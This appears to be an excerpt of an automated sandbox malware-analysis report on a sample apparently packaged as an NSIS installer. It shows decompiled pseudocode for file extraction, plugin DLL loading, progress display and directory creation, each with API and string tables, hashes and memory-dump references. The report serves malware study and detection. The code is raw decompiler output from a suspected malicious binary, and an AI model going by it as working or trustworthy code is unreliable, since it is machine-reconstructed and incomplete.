						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405FD2(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E00405FF7(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E00405569(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x42a2a8;
						goto L32;
					} else {
						E00406507("C:\Users\jones\AppData\Local\Temp\nsj9DE8.tmp", _t83);
						E00406507(_t83, _t81);
						E00406544(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp\nsj9DE8.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E00406507(_t83, "C:\Users\jones\AppData\Local\Temp\nsj9DE8.tmp");
						_t64 = E00405B67("C:\Users\jones\AppData\Local\Temp\nsj9DE8.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x42a2a8 =  &( *0x42a2a8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E00405569();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E00405569(0xffffffea,  *(_t86 - 8));
				 *0x42a2d4 =  *0x42a2d4 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t86 - 0x38));
				_push( *((intOrPtr*)(_t86 - 0x28)));
				_t45 = E004032B4(); // executed
				 *0x42a2d4 =  *0x42a2d4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E00406544(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E00406544(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B67();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040292e
0x0040292e
0x00402c2a
0x00402c2d
0x00402c2d
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402c33
0x00402c33
0x00402c33
0x00401867
0x00401867
0x00401868
0x00401493
0x0040239d
0x0040239d
0x0040239d
0x00401865
0x0040185e
0x00402c35
0x00402c39
0x00402c39
0x00401892
0x00401897
0x0040189d
0x0040189e
0x0040189f
0x004018a2
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402398
0x00000000
0x00402398
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,00436000,?,?,00000031), ref: 004017D5

Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514

Part of subcall function 00405569: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
Part of subcall function 00405569: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,004033ED), ref: 004055C4
Part of subcall function 00405569: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll), ref: 004055D6
Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

Strings

C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp, xrefs: 00401821, 0040183F
C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll, xrefs: 00401835, 00401851
Call, xrefs: 0040178D, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp$C:\Users\user\AppData\Local\Temp\nsj9DE8.tmp\System.dll$Call
API String ID: 1941528284-373189203
Opcode ID: b7a5c6d7991662512772549b684664b1194690f22d2238f758046a2bb3bdcfd9
Instruction ID: a51aac5e68297d7f44276dbadf5c543e50a4c9306f3e74aef663979029aae524
Opcode Fuzzy Hash: b7a5c6d7991662512772549b684664b1194690f22d2238f758046a2bb3bdcfd9
Instruction Fuzzy Hash: AA41A071900105BACF11BBA5DD85DAE3AB9EF45328F20423FF412B10E1D63C8A519A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004032B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				long _v16;
				intOrPtr _v20;
				short _v148;
				void* _t59;
				intOrPtr _t69;
				long _t70;
				void* _t71;
				intOrPtr _t81;
				intOrPtr _t86;
				long _t89;
				signed int _t90;
				int _t91;
				int _t92;
				intOrPtr _t93;
				void* _t94;
				void* _t95;

				_t90 = _a16;
				_t86 = _a12;
				_v12 = _t90;
				if(_t86 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t81 = _t86;
				if(_t86 == 0) {
					_t81 = 0x418ec0;
				}
				_t56 = _a4;
				if(_a4 >= 0) {
					E004034AF( *0x42a278 + _t56);
				}
				if(E00403499( &_a16, 4) == 0) {
					L33:
					_push(0xfffffffd);
					goto L34;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t86 == 0) {
							while(_a16 > 0) {
								_t91 = _v12;
								if(_a16 < _t91) {
									_t91 = _a16;
								}
								if(E00403499(0x414ec0, _t91) == 0) {
									goto L33;
								} else {
									if(E004060A9(_a8, 0x414ec0, _t91) == 0) {
										L28:
										_push(0xfffffffe);
										L34:
										_pop(_t59);
										return _t59;
									}
									_v8 = _v8 + _t91;
									_a16 = _a16 - _t91;
									continue;
								}
							}
							L43:
							return _v8;
						}
						if(_a16 < _t90) {
							_t90 = _a16;
						}
						if(E00403499(_t86, _t90) != 0) {
							_v8 = _t90;
							goto L43;
						} else {
							goto L33;
						}
					}
					_v16 = GetTickCount();
					E00406A2F(0x40ce30);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L43;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t92 = 0x4000;
						if(_a16 < 0x4000) {
							_t92 = _a16;
						}
						if(E00403499(0x414ec0, _t92) == 0) {
							goto L33;
						}
						_a16 = _a16 - _t92;
						 *0x40ce48 = 0x414ec0;
						 *0x40ce4c = _t92;
						while(1) {
							 *0x40ce50 = _t81;
							 *0x40ce54 = _v12; // executed
							_t69 = E00406A4F(0x40ce30); // executed
							_v20 = _t69;
							if(_t69 < 0) {
								break;
							}
							_t93 =  *0x40ce50; // 0x418ec0
							_t94 = _t93 - _t81;
							_t70 = GetTickCount();
							_t89 = _t70;
							if(( *0x42a2d4 & 0x00000001) != 0 && (_t70 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v148, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t95 = _t95 + 0xc;
								E00405569(0,  &_v148);
								_v16 = _t89;
							}
							if(_t94 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L43;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t94;
									_v12 = _v12 - _t94;
									_t81 =  *0x40ce50; // 0x418ec0
									L23:
									if(_v20 != 1) {
										continue;
									}
									goto L43;
								}
								_t71 = E004060A9(_a8, _t81, _t94); // executed
								if(_t71 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t94;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L34;
					}
					goto L33;
				}
			}

0x004032bf
0x004032c3
0x004032c6
0x004032cb
0x004032cd
0x004032cd
0x004032d4
0x004032d8
0x004032dc
0x004032de
0x004032de
0x004032e3
0x004032e8
0x004032f3
0x004032f3
0x00403305
0x00403450
0x00403450
0x00000000
0x0040330b
0x0040330f
0x0040343b
0x00403484
0x00403455
0x0040345b
0x0040345d
0x0040345d
0x0040346e
0x00000000
0x00403470
0x0040347c
0x00403435
0x00403435
0x00403452
0x00403452
0x00000000
0x00403452
0x0040347e
0x00403481
0x00000000
0x00403481
0x0040346e
0x0040348f
0x00000000
0x0040348f
0x00403440
0x00403442
0x00403442
0x0040344e
0x0040348c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040344e
0x00403320
0x00403323
0x00403328
0x00403328
0x00403332
0x00403335
0x00000000
0x00000000
0x00000000
0x00000000
0x0040333b
0x0040333b
0x0040333b
0x00403343
0x00403345
0x00403345
0x00403356
0x00000000
0x00000000
0x0040335c
0x0040335f
0x00403365
0x0040336b
0x00403373
0x00403379
0x0040337e
0x00403385
0x00403388
0x00000000
0x00000000
0x0040338e
0x00403394
0x00403396
0x004033a3
0x004033a5
0x004033d6
0x004033dc
0x004033e8
0x004033ed
0x004033ed
0x004033f2
0x00403429
0x00000000
0x00000000
0x00000000
0x004033f4
0x004033f8
0x0040340d
0x00403410
0x00403413
0x00403419
0x0040341d
0x00000000
0x00000000
0x00000000
0x00403423
0x004033ff
0x00403406
0x00000000
0x00000000
0x00403408
0x00000000
0x00403408
0x004033f2
0x00403431
0x00000000
0x00403431
0x00000000
0x0040333b

APIs

GetTickCount.KERNEL32 ref: 00403315
GetTickCount.KERNEL32 ref: 00403396
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033C3
wsprintfW.USER32 ref: 004033D6

Strings

... %d%%, xrefs: 004033D0
G8@, xrefs: 004032B4

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$G8@
API String ID: 551687249-649311722
Opcode ID: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
Instruction ID: 27b76012fb03590ae9ad79c5aacab076c27bed8bf8d9d3eaec1048eb1f993e7f
Opcode Fuzzy Hash: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
Instruction Fuzzy Hash: 7F519D71900219DBCB11DF65DA446AF7FA8AB40766F14417FFD00BB2C1D7788E408BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406864 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406864(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x0040687b
0x00406884
0x00406886
0x00406886
0x0040688a
0x0040689d
0x00406897
0x00406897
0x00406897
0x004068b6
0x004068ca
0x004068d1

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
wsprintfW.USER32 ref: 004068B6
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA

Strings

UXTHEME, xrefs: 0040686D
\, xrefs: 0040688C
%s%S.dll, xrefs: 004068B0

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: a3f2ba33ef282063e8bef789480649f163c4345fe71bbebd74fcccbb96bf8ece
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: 8DF0F671511119ABCB14BF64ED0DF9B376CAB00305F51447AAA46F10D0EB7CAA69CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A38 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405A38(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405a43
0x00405a47
0x00405a4a
0x00405a50
0x00405a54
0x00405a58
0x00405a60
0x00405a67
0x00405a6d
0x00405a74
0x00405a7b
0x00405a83
0x00405a85
0x00000000
0x00405a85
0x00405a8f
0x00405a96
0x00405aac
0x00000000
0x00000000
0x00000000
0x00405aae
0x00405ab2

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
GetLastError.KERNEL32 ref: 00405A8F
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AA4
GetLastError.KERNEL32 ref: 00405AAE

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5E

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3081826266
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 227e2837d2f0abbefd05ded2a29fab346f6aadb36d837cb996d7b4b6dfe3b4b1
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: A7010C71D00219EEDF009B90D948BEFBBB8EB04314F00413AD945B6181D77896488FE9

Uniqueness

Uniqueness Score: -1.00%

Function 73331817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E73331817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x7333506c = _a8;
				 *0x73335070 = _a16;
				 *0x73335074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73335048, E73331651);
				_push(1); // executed
				_t37 = E73331BFF(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E7333243E(_t54);
					}
					_push(_t54);
					E73332480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E73332655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E73331666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E73332655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E73332655();
							_t37 = GlobalFree(E73331312(E73331654(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E73332618(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E733315DD( *0x73335068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E73332E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E73332B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E73332810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x73331817
0x73331817
0x73331817
0x73331824
0x7333182c
0x73331839
0x73331847
0x7333184a
0x7333184c
0x73331851
0x73331856
0x73331978
0x73331978
0x7333185c
0x73331860
0x73331863
0x73331868
0x73331869
0x7333186a
0x73331870
0x73331876
0x733318a6
0x733318ad
0x733318d1
0x7333191e
0x7333191f
0x733318d3
0x733318d3
0x733318d4
0x733318dd
0x733318de
0x733318e8
0x733318eb
0x733318f0
0x733318f7
0x733318f7
0x733318fd
0x733318fe
0x73331904
0x7333190a
0x73331917
0x73331918
0x7333191b
0x733318af
0x733318af
0x733318b0
0x733318c5
0x733318c5
0x73331929
0x7333192c
0x73331939
0x73331940
0x73331948
0x7333194b
0x7333194b
0x73331948
0x73331958
0x73331960
0x73331965
0x73331958
0x7333196d
0x00000000
0x7333196f
0x00000000
0x73331970
0x7333196d
0x7333187a
0x7333187d
0x7333189b
0x00000000
0x00000000
0x7333189e
0x733318a3
0x733318a3
0x733318a5
0x00000000
0x733318a5
0x7333187f
0x73331880
0x73331888
0x73331889
0x00000000
0x73331889
0x73331882
0x73331883
0x73331891
0x00000000
0x73331891
0x73331886
0x00000000
0x00000000
0x00000000
0x73331886

APIs

Part of subcall function 73331BFF: GlobalFree.KERNEL32 ref: 73331E74
Part of subcall function 73331BFF: GlobalFree.KERNEL32 ref: 73331E79
Part of subcall function 73331BFF: GlobalFree.KERNEL32 ref: 73331E7E

GlobalFree.KERNEL32 ref: 733318C5
FreeLibrary.KERNEL32(?), ref: 7333194B
GlobalFree.KERNEL32 ref: 73331970

Part of subcall function 7333243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7333246F

Part of subcall function 73332810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73331896,00000000), ref: 733328E0

Part of subcall function 73331666: wsprintfW.USER32 ref: 73331694

Strings

, xrefs: 73331951

Memory Dump Source

Source File: 00000000.00000002.773267858.0000000073331000.00000020.00000001.01000000.00000005.sdmp, Offset: 73330000, based on PE: true

Associated: 00000000.00000002.773256620.0000000073330000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.773280632.0000000073334000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.773288025.0000000073336000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73330000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Global$Free$Alloc$Librarywsprintf
String ID:
API String ID: 3962662361-3916222277
Opcode ID: 2b76ebd9b62383a2b7df0ceda151d820111386caeec4c6884f1cd48ed996f791
Instruction ID: e2346d5294f210fcf3f9183426908b796bcf1138cfd7853b19da11761a5904a1
Opcode Fuzzy Hash: 2b76ebd9b62383a2b7df0ceda151d820111386caeec4c6884f1cd48ed996f791
Instruction Fuzzy Hash: B9418E72D003059BEB31BF64DD84B9537ACEF06311F98C469E94B9E0CADBB8908587A0

Uniqueness

Uniqueness Score: -1.00%

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E0040644E();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}

0x00401c43
0x00401c45
0x00401c4c
0x00401c4f
0x00401c52
0x00401c5c
0x00401c60
0x00401c63
0x00401c6c
0x00401c6c
0x00401c6f
0x00401c73
0x00401c7c
0x00401c7c
0x00401c7f
0x00401c83
